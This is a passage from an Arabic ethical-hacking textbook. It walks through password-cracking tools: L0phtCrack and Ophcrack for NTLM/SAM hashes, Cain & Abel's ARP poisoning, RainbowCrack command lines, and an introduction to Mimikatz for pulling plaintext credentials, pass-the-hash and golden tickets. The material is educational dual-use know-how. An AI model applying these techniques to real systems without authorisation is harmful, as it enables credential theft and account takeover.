‫ﻓﻲ اﻟﺷﻛل ‪ .challenge/response format‬ﯾﻘوﻣﺎ اﻟﺧﺎدم ﺑﻣﻘﺎرﻧﺔ اﻻﺳﺗﺟﺎﺑﺔ )‪(response‬ﻣﻘﺎﺑل ‪ 24‬ﺑﺎﯾت ﻣن اﻻﺳﺗﺟﺎﺑﺔ اﻟﻣﺗوﻗﻌﺔ‬
‫)‪ (response‬اﻟﺧﺎﺻﺔ ﺑﮫ اﻟذي ﻗﺎﻣﺎ ھو ﺑﺣﺳﺎﺑﮭﺎ وﻧﺗﺎﺋﺞ اﻟﻣﻘﺎرﻧﺔ ھو اﻟﻣﺻﺎدﻗﺔ‪ .‬ﺣﯾث ﺗﻘوم اﻟﺧوارزﻣﯾﺔ ﺑﺗﻘﺳﯾم ﻛﻠﻣﺔ اﻟﻣرور إﻟﻰ ﻗطﺎﻋﯾن‬
‫ﻣﻧﻔﺻﻠﯾن ﻣﻛون ﻣن ﺳﺑﻌﺔ أﺣرف ﺛم اﻟﻘﯾﺎم ﺑﺎﻟﮭﺎش ﻟﻛل ﻗطﺎع ﺑﺷﻛل ﻓردي‪ .‬وھذا ﯾﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن ﺑﺗﻘﯾﯾد ﻛﺳر ﻛﻠﻣﺔ اﻟﺳر إﻟﻰ ﺳﺑﻌﺔ أﺣرف‪،‬‬
‫وﯾﺟﻌل اﻟﻌﻣﻠﯾﺔ أﺳﮭل‪ .‬ﺿﻌف ھﺎش ﻛﻠﻣﺔ اﻟﺳر‪ ،‬إﻟﻰ ﺟﺎﻧب اﻧﺗﻘﺎل اﻟﮭﺎش ﻋﺑر اﻟﺷﺑﻛﺔ ﻓﻲ ﺷﻛل اﻟﺗوﺛﯾﻖ‪/‬اﻻﺳﺗﺟﺎﺑﺔ‪ ،‬ﯾﺟﻌل اﻟﻧظم اﻟﻘﺎﺋﻣﺔ ﻋﻠﻰ‬
‫‪ LM‬ﻋرﺿﺔ ﻟﻼﻋﺗراض ﺗﻠﯾﮭﺎ ھﺟﻣﺎت ‪ dictionary‬و‪ brute-force‬ﺑواﺳطﺔ ‪L0phtCrack 6. L0phtCrack‬ﻟدﯾﮫ ﻗدره ﻣدﻣﺟﺔ‬
‫ﻋﻠﻰ اﺳﺗﯾراد ﻛﻠﻣﺎت اﻟﺳر ﻣن وﯾﻧدوز ﻋن ﺑﻌد‪ ،‬ﺑﻣﺎ ﻓﻲ ذﻟك اﻹﺻدارات ‪-64‬ﺑت ﻣن وﯾﻧدوز ﻓﯾﺳﺗﺎ ‪ ،‬وﯾﻧدوز ‪ ،7‬وآﻻت ﯾوﻧﻛس ‪ ،‬دون اﻟﺣﺎﺟﺔ‬
‫إﻟﻰ أداة ﺧﺎرﺟﯾﺔ‪.‬‬

‫ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﻧﻘوم ﺑﺗﺛﺑﯾت ھذه اﻷداة ﺑﺎﺗﺑﺎع ‪ wizard‬اﻟﺧﺎص ﺑﻌﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت ﺛم اﻟﻧﻘر ﻓوق اﻷﯾﻘوﻧﺔ اﻟﻣﻌﺑرة ﻋﻧﮫ‬ ‫‪-‬‬
‫)‪ (L0phtCrack6‬ﻓﺗؤدى اﻟﻰ ظﮭور اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ‪.‬‬

‫ﻓﻲ ‪ L0phtCrack 6 Wizard‬ﻧﻧﻘر ﻓوق ‪ Next‬واﻟذي ﯾﻧﻘﻠﻧﺎ اﻟﻰ اﻟﺧطوة اﻟﺛﺎﻧﯾﺔ ﻛﻣﺎ ھو ﻣوﺿﺢ اﻣﻣﻧﺎ‪.‬‬ ‫‪-‬‬
‫ﻧﺟد اﻧﮫ ظﮭرت اﻣﻣﺎﻧﺎ ﻗﺎﺋﻣﮫ ﺑﮭﺎ اﻟﻌدﯾد ﻣن اﻟﺧﯾﺎرات واﻟذي ﯾرﯾد ﻣﻧك ﺗوﺿﯾﺢ اﻟﻣﻛﺎن اﻟذي ﺳوف ﯾﺄﺧذ ﻣن ھﺎش ﻛﻠﻣﺎت اﻟﻣرور‬ ‫‪-‬‬
‫وھﻧﺎ ﺳوف ﻧﺧﺗﺎر ‪ Retrieve from the local machine‬ﺛم ﻧﻧﻘر ﻓوق‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪354‬‬

‫ﻧﻧﺗﻘل اﻻن اﻟﻰ اﻟﺧطوة اﻟﺛﺎﻟﺛﺔ‪ ،‬واﻟﺗﻲ ﺗﺄﺗﻰ ھﻲ اﻷﺧرى ﺑﺎﻟﻌدﯾد ﻣن ﺧﯾﺎرات اﻟﺗدﻗﯾﻖ )‪ (auditing method‬واﻟﺗﻲ ﺗرﯾد ﻣﻧك‬ ‫‪-‬‬
‫اﺧﺗﯾﺎر أي ﻣن ﻧظﺎم اﻟﺗدﻗﯾﻖ اﻟﺗﻲ ﺗرﯾد اﺳﺗﺧداﻣﮫ وھذا ﯾﻌﺗﻣد ﻋﻠﻰ ﻗوة اﻟﮭﺎش‪ .‬ھﻧﺎ ﺳوف ﻧﺧﺗﺎر اﻗواھم وھو ‪Strong Password‬‬
‫‪ Audit‬ﺛم ﻧﻧﻘر ﻓوق ‪ Next‬ﻟﻠﺗﻧﻘل اﻟﻰ اﻟﻣرﺣﻠﺔ اﻟراﺑﻌﺔ‪.‬‬

‫ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ ذات اﻟﻌﻧوان ‪ Pick reporting Style‬واﻟﺗﻲ ﻓﯾﮭﺎ ﺗﺣدﯾد ﻧوﻋﯾﺔ اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﺳوف ﺗﻌرض ﻓﻲ اﻟﺗﻘرﯾر‪.‬‬ ‫‪-‬‬
‫اﻓﺗراﺿﯾﺎ ﯾوﺟد ﻋﻼﻣﺔ ﻋﻠﻰ اﻟﺟﻣﯾﻊ ﻣﺎ ﻋدا واﺣدا وھﯾﺎ ’‪ Display encrypted password ’hash‬ﺣﯾث ﺳوف ﻧﺧﺗﺎرھﺎ ھﻲ‬
‫اﻷﺧرى ﺛم ﺑﻌد ذﻟك ﻧﻧﻘر ﻓوق ‪ next‬ﻟﻼﻧﺗﻘﺎل اﻟﻰ اﻟﻣرﺣﻠﺔ اﻟﺗﺎﻟﯾﺔ واﻷﺧﯾرة ﻣن ﻋﻣﻠﯾﺔ ‪.wizard‬‬
‫ﻓﻲ اﻟﻣرﺣﻠﺔ اﻷﺧﯾرة ﯾﻘوم ﺑﻌرض ﺳرﯾﻊ ﻻﺧﺗﯾﺎرات ﻓﻲ ﺟﻣﯾﻊ اﻟﻣراﺣل اﻟﺳﺎﺑﻘﺔ وﯾﺧﺑرك اﻧﮫ ﻋﻠﻰ اﺳﺗﻌداد ﻟﻠﻘﯾﺎم ﺑﺎﻟﻌﻣﻠﯾﺔ‪.‬‬ ‫‪-‬‬
‫ﻧﻧﻘر ھﻧﺎ ﻓوق ‪.FINISH‬‬ ‫‪-‬‬
‫ﺑﻌد اﻻﻧﺗﮭﺎء ﯾظﮭر ﻟك رﺳﺎﻟﺔ ﺗﺧﺑرك ﺑﺎﻧﮫ أﻧﮭﻲ اﻟﻌﻣﻠﯾﺔ )‪ (Audit completed‬ﻧﻧﻘر ﻓوق ‪.OK‬‬ ‫‪-‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪355‬‬

‫ﻓﻲ ﻗﺎﺋﻣﺔ اﻷدوات اﻟﻌﻠوﯾﺔ ﻧﻧﻘر ﻓوق اﻷداة ‪.session options‬‬ ‫‪-‬‬

‫ﺑﻌد اﻟﻧﻘر ﻓوق ‪ Session Options‬ﺗظﮭر اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ وﻧﺧﺗﺎر ﻣﻧﮭﺎ ﺗﻔﻌﯾل اﻻﺗﻲ‪:‬‬ ‫‪-‬‬
‫‪ Crack NTLM Passwords‬ﻓﻲ اﻟﺟزء اﻟﻣﻧدرج ﺗﺣت ﻋﻧوان ‪.Dictionary crack‬‬
‫‪ Crack NTLM Passwords‬ﻓﻲ اﻟﺟزء اﻟﻣﻧدرج ﺗﺣت ﻋﻧوان ‪.Dictionary/Brute Hybrid crack‬‬
‫‪ Crack NTLM Passwords‬ﻓﻲ اﻟﺟزء اﻟﻣﻧدرج ﺗﺣت ﻋﻧوان ‪.Brute force crack‬‬
‫‪Enable Brute Force Minimum Character Count‬‬
‫‪Enable Brute Force Maximum Character Count‬‬
‫ﺛم ﻧﻧﻘر ﻓوق ‪.OK‬‬ ‫‪-‬‬

‫ﺑﺗﺣﻠﯾل اﻟﮭﺎش وإﻋطﺎﺋك ﺗﻘرﯾر‬ ‫ﺛم ﺑﻌد اﻟﻧﻘر ﻓوق ‪ OK‬ﻧرﺟﻊ اﻟﻰ اﻟﺷﺎﺷﺔ اﻟرﺋﯾﺳﯾﺔ وﻧﻧﻘر ﻓﻘوق اﻟﻌﻼﻣﺔ ‪ BEGIN‬ﻟﯾﺑدأ‬ ‫‪-‬‬
‫ﻋن ﻛﺳر ﻛﻠﻣﺔ اﻟﻣرور‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪356‬‬

‫‪Ophcrack‬‬
‫اﻟﻣﺻدر‪http://ophcrack.sourceforge.net :‬‬

‫‪ Ophcrack‬ھو أداة ﻟﻛﺳر ﻛﻠﻣﺔ اﻟﺳر وﯾﻧدوز وﯾﺳﺗﺧدم ﺟداول ‪ rainbow tables‬ﻟﻛﺳر ﻛﻠﻣﺎت اﻟﺳر‪ .‬ﻷﻧﮫ ﯾﺄﺗﻲ ﻣﻊ واﺟﮭﺔ اﻟﻣﺳﺗﺧدم‬
‫اﻟرﺳوﻣﯾﺔ وﯾﻌﻣل ﻋﻠﻰ أﻧظﻣﺔ ﺗﺷﻐﯾل ﻣﺧﺗﻠﻔﺔ ﻣﺛل وﯾﻧدوز‪ ،‬ﻟﯾﻧوﻛس ‪ /‬ﯾوﻧﯾﻛس‪ ،‬اﻟﺦ‪.‬‬
‫ﯾوﻓر ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ﻧﺳﺧﺔ ﺳطر اﻷواﻣر ‪ CLI‬وﻧﺳﺧﺔ اﻟﻣﺳﺗﺧدم اﻟرﺳوﻣﯾﺔ ‪ GUI‬ﻣن ﺗطﺑﯾﻖ ‪.Ophcrack‬‬

‫اﻟﻣﻣﯾزات‪:‬‬
‫‪ -‬ﻛﺳر ھﺎﺷﺎت ﻣن اﻟﻧوع ‪LM‬و‪.NTLM‬‬
‫‪ -‬ﯾﺳﺗﺧدم ‪ Brute-force module‬ﻟﻛﺳر اﻟﻛﻠﻣﺎت اﻟﺑﺳﯾطﺔ‬
‫‪ -‬ﯾﺳﺗﺧدم رﺳوم ﺑﯾﺎﻧﯾﺔ ﻟﺗﺣﻠﯾل ﻛﻠﻣﺎت اﻟﺳر‪.‬‬
‫‪ -‬ﺗﻔرﯾﻎ وﺗﺣﻣﯾل اﻟﮭش ﻣن اﻟﻣﻠف ‪ SAM‬ﻣن ﻗﺳم اﻟوﯾﻧدوز‪.‬‬
‫‪ o‬ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﻧﻘوم ﺑﺗﺛﺑﯾت ھذه اﻷداة ﺑﺎﺗﺑﺎع ‪ wizard‬اﻟﺧﺎص ﺑﻌﻣﻠﯾﺔ اﻟﺗﺛﺑﯾت ﺛم اﻟﻧﻘر ﻓوق اﻷﯾﻘوﻧﺔ اﻟﻣﻌﺑرة ﻋﻧﮫ‬
‫)‪ (Ophcrack‬ﻓﺗؤدى اﻟﻰ ظﮭور اﻟﺷﺎﺷﺔ اﻟﺗﺎﻟﯾﺔ او ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ﻋن رﯾﻖ اﺗﺑﺎع اﻟﻣﺳﺎر اﻟﺗﺎﻟﻲ ﻓﺗؤدى اﻟﻰ ظﮭور ﺷﺎﺷﮫ‬
‫ﻣﺛﯾﻠﮫ ﻟﺷﺎﺷﮫ اﻟﺗﺎﻟﯾﺔ‪.‬‬
‫‪Password Attacks | Offline Attacks | Ophcrack‬‬

‫‪ o‬ﻧﻼﺣظ ﻣن ﺷرﯾط اﻷدوات اﻟﻌﻠوي وﺟود اﻟزر ‪ load‬ﺑﻌض اﻟﻧﻘر ﻋﻠﯾﮫ ﺗظﮭر ﻗﺎﺋﻣﮫ ﺗﺣدد اﻟﻣﻛﺎن اﻟذي ﺳوف ﯾﺄﺧذ ﻣن اﻟﺗطﺑﯾﻖ ﺑﯾﺎﻧﺎت‬
‫‪ .SAM‬ﻧﺟد ﻣن ھذه اﻟﺧﯾﺎرات ‪ PWDUMP file‬وھذا ﺳوف ﯾﺄﺧذ ﻣن ﻧﺎﺗﺞ إﺧراج اﻷداة ‪ pwdump‬اﻟﺗﻲ ﺗﺣدﺛﻧﺎ ﻋﻧﮫ ﺳﺎﺑﻘﺎ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪357‬‬

‫‪ o‬ﺑﻌد ﺗﺣﻣﯾل ﻣﻠف اﻟﮭﺎش ﻛﻣﺎ ھو ﻣﺑﯾن ﻓﻲ اﻟﺷﻛل اﻟﺗﺎﻟﻲ‪:‬‬

‫‪ o‬ﻓﻲ ﺷرﯾط اﻷدوات اﻟﻌﻠوي ﻧﻘوم ﺑﺎﻟﻧﻘر ﻓوق ‪ Tables‬واﻟﺗﻲ ﯾؤدى اﻟﻰ ظﮭور اﻟﻘﺎﺋﻣﺔ اﻟﺗﺎﻟﯾﺔ‪.‬‬

‫‪ o‬ﺣﯾث ﻣن ﺧﻼل ھذه اﻟﻘﺎﺋﻣﺔ ﯾﻣﻛن ﺗﺣﻣﯾل ‪ Rainbow table‬ﺛم ﺑﻌد ﺗﺣﻣﯾﻠﮫ ﻧرﺟﻊ اﻟﻰ اﻟﺷﺎﺷﺔ اﻟرﺋﯾﺳﯾﺔ وﻧﻧﻘر ﻓوق اﻟزر ‪Crack‬‬
‫ﻟﯾﺑدأ ﻋﻣﻠﯾﺔ ﻛﺳر اﻟﮭﺎش وﺗﺣﻠﯾل ﻛﻠﻣﺎت اﻟﻣرور‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪358‬‬

‫‪Cain & Abel‬‬


‫اﻟﻣﺻدر‪http://www.oxid.it :‬‬

‫‪ Cain & Abel‬ھﻲ أداة ﻻﺳﺗﻌﺎدة ﻛﻠﻣﺔ اﻟﺳر‪ .‬ﯾﺗم ﺗﺷﻐﯾﻠﮫ ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻣﺎﯾﻛروﺳوﻓت‪ .‬ﻓﺈﻧﮫ ﯾﺳﻣﺢ ﻟك ﻻﺳﺗﻌﺎدة أﻧواع ﻣﺧﺗﻠﻔﺔ ﻣن ﻛﻠﻣﺎت‬
‫اﻟﺳر ﻣن ﺧﻼل اﻟﺗﺟﺳس ﻋﻠﻰ اﻟﺷﺑﻛﺔ )‪ ،(sniffing network‬وﻛﺳﯾر ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺷﻔرة ﺑﺎﺳﺗﺧدام ھﺟﻣﺎت اﻟﻘﺎﻣوس‪،brute-force ،‬‬
‫ھﺟﻣﺎت ﺗﺣﻠﯾل اﻟﺷﻔرات‪ ،‬ﺗﺳﺟﯾل ﻣﺣﺎدﺛﺎت‪ ، VolP‬ﻓك ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺧﻠوطﺔ )‪ ،(decoding scrambled passwords‬واﺳﺗﻌﺎدة ﻣﻔﺎﺗﯾﺢ‬
‫اﻟﺷﺑﻛﺔ ﻻﺳﻠﻛﯾﺔ‪ ،revealing password boxes ،‬ﻛﺷف ﻛﻠﻣﺎت اﻟﺳر اﻟﻣﺧزﻧﺔ ﻣؤﻗﺗﺎ‪ ،‬وﺗﺣﻠﯾل ﺑروﺗوﻛوﻻت اﻟراوﺗر‪ .‬ﻣﻊ ﻣﺳﺎﻋدة ﻣن ھذه‬
‫اﻷداة‪ ،‬ﻓﺎن ﻛﻠﻣﺎت اﻟﺳر وﺑﯾﺎﻧﺎت اﻻﻋﺗﻣﺎد ﻣن ﻣﺻﺎدر ﻣﺧﺗﻠﻔﺔ ﯾﻣﻛن اﺳﺗردادھﺎ ﺑﺳﮭوﻟﺔ‪.‬‬

‫ھذه اﻷداة ﺗﺗﻛون ﻣن ‪ (Arp Poison Routing) APR‬اﻟﺗﻲ ﺗﻣﻛﻧك ﻣن اﻟﺗﺟﺳس ﻋﻠﻰ اﻟﺷﺑﻛﺎت اﻟﻣﺣﻠﯾﺔ وھﺟﻣﺎت رﺟل ﻓﻲ اﻟﻣﻧﺗﺻف‪.‬‬
‫‪ Sniffing‬ﻓﻲ ھذه اﻷداة ھﻲ أﯾﺿﺎ ﻗﺎدرة ﻋﻠﻰ ﺗﺣﻠﯾل اﻟﺑروﺗوﻛوﻻت اﻟﻣﺷﻔرة ﻣﺛل ‪ HTTP‬و ‪ ،SSH-1‬وﯾﺣﺗوي ﻋﻠﻰ ﻣرﺷﺣﺎت ﻻﻟﺗﻘﺎط‬
‫‪ credentials‬ﻣن ﻣﺟﻣوﻋﺔ واﺳﻌﺔ ﻣن آﻟﯾﺎت اﻟﺗوﺛﯾﻖ‪.‬‬

‫‪Rainbowcrack‬‬
‫اﻟﻣﺻدر‪http://www.project-rainbowcrack.com :‬‬

‫‪ RainbowCrack‬ھو ﺗطﺑﯾﻖ ﯾﺳﺗﺧدم ﻟﻛﺳر اﻟﮭﺎش ﻋن طرﯾﻖ اﺳﺗﺧدام ﺟداول ‪ .Rainbow table‬ﺣﯾث إﻧﮫ ﯾﺳﺗﺧدم ﺧوارزﻣﯾﺔ‬
‫‪ time-memory tradeoff‬ﻟﻛﺳر اﻟﮭﺎش‪ .‬ﺑﺎﻹﺿﺎﻓﺔ اﻟﻰ ذﻟك ﻓﺎﻧﮫ ﯾﺳﺗﺧدم ‪ brute force cracker‬ﻟﻛﺳر اﻟﮭﺎش واﻟﺗﻲ ﺗﺧﺗﻠف ﻋﻧد‬
‫ﻣﻘﺎرﻧﺗﮫ ﻣﻊ ‪ .time-memory tradeoff hash cracker‬ﺣﯾث أن ‪ brute force cracker‬ﻟﻛﺳر اﻟﮭﺎش ﺳوف ﺗﺣﺎول اﺳﺗﺧدام ﻛل‬
‫‪ plaintexts‬ﻣﻣﻛﻧﺔ واﺣدا ﺗﻠو اﻵﺧر ﺧﻼل ﻋﻣﻠﯾﺔ اﻟﻛﺳر‪ ،‬ﻓﻲ ﺣﯾن ان ‪ RainbowCrack‬ﯾﺣﺳب ﺟﻣﯾﻊ أزواج ‪plaintext-ciphertext‬‬
‫اﻟﻣﻣﻛﻧﺔ ﻓﻲ وﻗت ﻣﺑﻛر وﺗﺧزﯾﻧﮭﺎ ﻓﻲ اﻟﻣﻠف ‪ .rainbow table‬ﻗد ﯾﺳﺗﻐرق وﻗﺗﺎ طوﯾﻼ ﻗﺑل ﺣﺳﺎب اﻟﺟداول‪ ،‬وﻟﻛن ﺑﻣﺟرد اﻻﻧﺗﮭﺎء ﻣن ﻣرﺣﻠﺔ‬
‫اﻟﺣﺳﺎب‪ ،‬ﺳوف ﺗﻛون ﻗﺎدرة ﻋﻠﻰ ﻛﺳر اﻟﺷﻔرات اﻟﻧص اﻟﻣﺷﻔر ﻓﻲ ﺟداول ‪ Rainbow table‬ﺑﺳﮭوﻟﺔ وﺑﺳرﻋﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪359‬‬

‫ﻣﻠﺣوظﮫ‪ :‬ھذه اﻷداة ﻣدﻣﺟﺔ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ وﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻣن ﺧﻼل ﻛﺗﺎﺑﺔ اﻟﺳطر ]‪ [rcrack *.rt -f crackme‬ﻓﻲ اﻟﺗرﻣﻧﺎل‪.‬‬
‫ﺣﯾث ﯾﻣﺛل ]‪ Rainbow table [*.rt‬وﯾﻣﺛل اﻟﻣﻠف ‪ crackme‬اﻟﻣﻠف اﻟذي ﯾﺣﺗوي ﻋﻠﻰ اﻟﮭﺎش‪ .‬ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ﯾﻣﻛن اﯾﺿﺎ‬
‫اﺳﺗﺧدام ‪ rainbow crack‬أﯾﺿﺎ ﻋن طرﯾﻖ ﻛﺗﺎﺑﺔ اﻟﺳر ]‪ [rcracki_mt -h hash rainbow_table_pathname‬واﻟﺗﻲ ﺗﻌد ﻧﺳﺧﮫ‬
‫ﻣﺣدﺛﮫ ﻣن اﻟﺳﺎﺑﻘﺔ‪.‬‬
‫‪#rcracki_mt -h hash rainbow_table_pathname‬‬
‫‪#rcracki_mt -l hash_list_file rainbow_table_pathname‬‬
‫‪#rcracki_mt -f pwdump_file rainbow_table_pathname‬‬
‫‪#rcracki_mt -c lst_file rainbow_table_pathname‬‬
‫أﯾﺿﺎ ﻓﻲ ﻧظﺎم اﻟﺗﺷﻐﯾل ﻛﺎﻟﻲ ﯾوﺟد ﺑﻌض اﻷدوات اﻷﺧرى اﻟﻘﺎﺋﻣﺔ ﻋﻠﻰ اﺳﺗﺧدام ‪ rainbow table‬واﻟﻣوﺟودة ﻓﻲ اﻟﻣﺳﺎر‬
‫‪./usr/share/rainbowcrack/‬‬
‫ﻣﺛل ‪ rtgn‬اﻟذي ﯾﺳﺗﺧدم ﻹﻧﺷﺎء ‪rainbow table‬‬

‫‪ Rcrack‬اﻟﺗﻲ ﺗﺣدﺛﻧﺎ ﻋﻧﮭﺎ ﺳﺎﺑﻘﺎ وﺑﻌض اﻷدوات اﻷﺧرى اﻟﺧﺎﺻﺔ ﺑﺎﻟﻌﻣل ﻋﻠﻰ ‪.rainbow table‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪360‬‬

‫‪Mimikatz Tool to Recover Plain Text Passwords‬‬

‫ﻣﻘﺪﻣﮫ‬
‫ﻓﻲ ھذا اﻟﺟزء ﺳوف ﻧﺗﻧﺎول اﺳﺗﻌﺎدة ﻛﻠﻣﺎت اﻟﺳر ﻋن ﺑﻌد ﻓﻲ ﻧص ﻋﺎدي‪ .‬أﻧﺎ ﻟن أدﻋﻲ أﻧﻧﻲ أﻓﮭم ﺑﺎﻟﺿﺑط ﻛﯾف ﯾﻔﻌل ﻣﺎ ﯾﻔﻌﻠﮫ‪ ،‬وﻟﻛن ﻣﺑرﻣﺟﻲ‬
‫ھذا اﻟﺗطﺑﯾﻖ ﻗد وﺟدوا ان ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز ﯾﻘوم ﺑﺗﺧزﯾن ﻛﻠﻣﺎت اﻟﻣرور ﻓﻲ ﻧص ﻋﺎدى ﻏﯾر ﻣﺷﻔر ﻓﻲ ﻋدة ﻣواﻗﻊ ﻣن اﻟﻌﻣﻠﯾﺎت اﻟﻘﺎﺋﻣﺔ‬
‫ﻋﻠﻰ اﻟوﯾﻧدوز )‪ .(windows process‬ﻟﻘد أﺻﺑﺢ ‪Mimikatz‬ﺑرﻧﺎﻣﺞ ﻣﺳﺗﻘل اﻵن ﯾﻌﻣل ﻋﻠﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز‪ ،‬وﺗﻣت إﺿﺎﻓﺔ اﻟﻰ‬
‫إطﺎر ‪ Metasploit‬ﺑوﺻﻔﮭﺎ وﺣدة ‪ ،Meterpreter‬ﻣﻣﺎ ﯾﺟﻌل اﺳﺗﻌﺎدة ﻛﻠﻣﺎت اﻟﺳر ﺳﮭﻠﮫ ﺑﻣﺟرد أن ﯾﻛون ﻟدﯾك ﺟﻠﺳﺔ ﻋﻣل ﺑﻌﯾدة‪.‬‬
‫‪ Mimikatz‬ھو أداة ‪ post-exploitation‬ﻋظﯾﻣﮫ اﻟﺗﻲ ﻛﺗﺑﮭﺎ ﺑﻧﯾﺎﻣﯾن دﯾﻠﺑﻲ )‪ .(Benjamin Delpy‬ھﻧﺎك اﻟﻛﺛﯾر ﻣن اﻷوﻗﺎت ﺑﻌد ﻗﯾﺎم‬
‫اﻟﻣﮭﺎﺟﻣﯾن ﺑﻣرﺣﻠﺔ ‪ exploitation‬أوﻟﯾﺔ ﻧﺎﺟﺣﺔ وﻟﻛﻧﮭم ﻗد ﯾرﻏﺑوا ﻓﻲ اﻟﺣﺻول ﻋﻠﻰ ﻣوطﺊ ﻗدم أﻛﺛر ﺛﺑﺎﺗﺎ ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر‪/‬اﻟﺷﺑﻛﺔ‪ .‬وﻏﺎﻟﺑﺎ ﻣﺎ‬
‫ﯾﺗطﻠب ذﻟك ﻣﺟﻣوﻋﺔ ﻣن اﻷدوات اﻟﺗﻛﻣﯾﻠﯾﺔ‪ Mimikatz .‬ھﻲ ﻣﺣﺎوﻟﺔ ﻟرﺑطﮭﺎ ﻣﻊ ﺑﻌض اﻟﻣﮭﺎم اﻷﻛﺛر ﻓﺎﺋدة واﻟﺗﻲ ﺳوف ﯾرﻏب اﻟﻣﮭﺎﺟﻣﯾن‬
‫ﻓﻲ اﻟﻘﯾﺎم ﺑﮭﺎ‪.‬‬
‫ھذه اﻷداة ﺗم اﻧﺷﺎﺋﮭﺎ ﻋﺎم ‪ 2007‬ﻟﺗﺗﻔﺎﻋل ﻣﻊ ﻣﻛوﻧﺎت أﻣن وﯾﻧدوز؛ ﻹﺛﺑﺎت ﺑﻌض ﻣﻔﺎھﯾم اﻷﻣن؛ ﻓﻲ ﻣﺣﺎوﻟﺔ ﻟﺗﺗﺑﻊ ﺗطور ‪.Microsoft‬‬
‫‪Mimikatz‬ھﻲ أداة ﻓﻲ اﻷﺳﺎس ﺗم ﺻﻧﻌﮭﺎ ﻟﺗﻌﻠم ‪C‬وزﯾﺎدة اﻟﻛﺛﯾر ﻣن اﻟﺗﺟﺎرب ﻣﻊ أﻣﺎن‪ . Windows‬وﺗﺳﺗﺧدم اﻵن اﻟﻣﻌروف ﺟﯾدا‬
‫ﻻﺳﺗﺧراج ﻛﻠﻣﺎت اﻟﺳر ﻋﻠﻰ ھﯾﺋﺔ ﻏﯾر ﻣﺷﻔره ‪ ،plaintexts‬اﻟﮭﺎش‪ ،‬رﻣز ‪ PIN‬وﺗذاﻛر ‪ Kerberos‬ﻣن اﻟذاﻛرة‪ Mimikatz .‬ﯾﻣﻛﻧﮭﺎ ان‬
‫ﺗؤدى أﯾﺿﺎ ‪ pass-the-ticket ،pass-the-hash‬أو ‪ ,build Golden tickets‬ﺗﺗﻼﻋب ﻣﻊ ‪ certificate‬أو اﻟﻣﻔﺎﺗﯾﺢ اﻟﺧﺎﺻﺔ‬
‫)‪ ... ، vault ،(private key‬رﺑﻣﺎ ﺗﺻﻧﻊ اﻟﻘﮭوة؟‬

‫ﻟﺣﺳن اﻟﺣظ‪ ،‬ﻗررت ‪ Metasploit‬إﺿﺎﻓﺔ ‪ Mimikatz‬ﻛﺑرﻧﺎﻣﺞ ﻧﺻﻲ ‪ meterpreter‬ﻟﻠﺳﻣﺎح ﻟﻠوﺻول إﻟﻰ ﻣﺟﻣوﻋﺔ ﻛﺎﻣﻠﺔ ﻣن اﻟﻣﯾزات‬
‫ﻣن دون اﻟﺣﺎﺟﺔ إﻟﻰ ﺗﺣﻣﯾل أي ﻣن اﻟﻣﻠﻔﺎت إﻟﻰ اﻟﻘرص اﻟﻣﺿﯾف اﻟﮭدف‪.‬‬
‫ﻣﻼﺣظﺔ‪ :‬إﺻدار ‪ Mimikatz‬ﻓﻲ ‪ metasploit‬ھو ‪ ،v1.0‬وﻣﻊ ذﻟك أﺻدر ﺑﻧﯾﺎﻣﯾن دﯾﻠﺑﻲ ﺑﺎﻟﻔﻌل ‪ v2.0‬ﻛﺣزﻣﺔ واﺣدة ﻗﺎﺋﻣﺔ ﺑذاﺗﮭﺎ‬
‫ﻋﻠﻰ ﻣوﻗﻌﮫ ﻋﻠﻰ اﻻﻧﺗرﻧت‪ .‬ﺣﯾث ان اﻟﻛﺛﯾر ﻣن ﺟﻣل اﻟﺑﻧﺎء ﻗد ﺗﻐﯾرت ﻣﻊ اﻟﺗرﻗﯾﺔ إﻟﻰ ‪ .v2.0‬وﯾﻣﻛن اﻟﺣﺻول ﻋﻠﯾﮭﺎ ﻣن ﺧﻼل اﻟﻣواﻗﻊ‬
